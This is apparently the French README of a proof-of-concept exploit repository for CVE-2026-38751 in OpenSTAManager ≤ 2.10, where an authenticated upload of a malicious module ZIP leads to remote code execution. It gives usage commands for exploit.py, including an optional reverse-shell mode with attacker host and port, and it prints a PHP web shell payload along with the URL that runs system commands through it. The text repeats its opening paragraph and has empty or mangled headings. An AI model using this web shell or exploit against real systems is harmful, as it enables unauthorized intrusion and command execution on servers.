
Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-38751, affectant OpenSTAManager ≤ 2.10. La vulnérabilité permet à un attaquant authentifié de télécharger un module malveillant via la fonctionnalité de mise à jour de module, conduisant à un téléchargement de fichier arbitraire et à une exécution de code à distance (RCE).
Ce dépôt contient un exploit de preuve de concept (PoC) pour CVE-2026-38751, affectant OpenSTAManager ≤ 2.10. La vulnérabilité permet à un attaquant authentifié de télécharger un module malveillant via la fonctionnalité de mise à jour des modules, entraînant un téléchargement arbitraire de fichier et une exécution de code à distance (RCE).
modules/aggiornamenti/upload_modules.php)La fonctionnalité de mise à jour des modules permet aux utilisateurs authentifiés de télécharger des modules au format ZIP sans validation appropriée du contenu des fichiers ou des limites d'exécution. Un attaquant peut concevoir un module malveillant contenant des charges utiles PHP, qui sont ensuite déployées dans la racine web et exécutées via le contexte de l'application. Cela entraîne :
##Impact Une exploitation réussie permet :
python exploit.py --build
Crée :
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
Mode shell inversé optionnel :
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
Exemple de charge utile
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
En cas de succès, le point d'accès suivant exécute des commandes système :
/modules/run/evil.php?cmd=id
Ce projet est destiné à :
Ne pas utiliser contre des systèmes sans autorisation explicite.
Notes
La détection peut varier en fonction de la configuration du serveur. Certains déploiements peuvent désactiver l'exécution directe de PHP dans les répertoires des modules. Le timing de l'activation du module peut nécessiter des tentatives.
Remerciements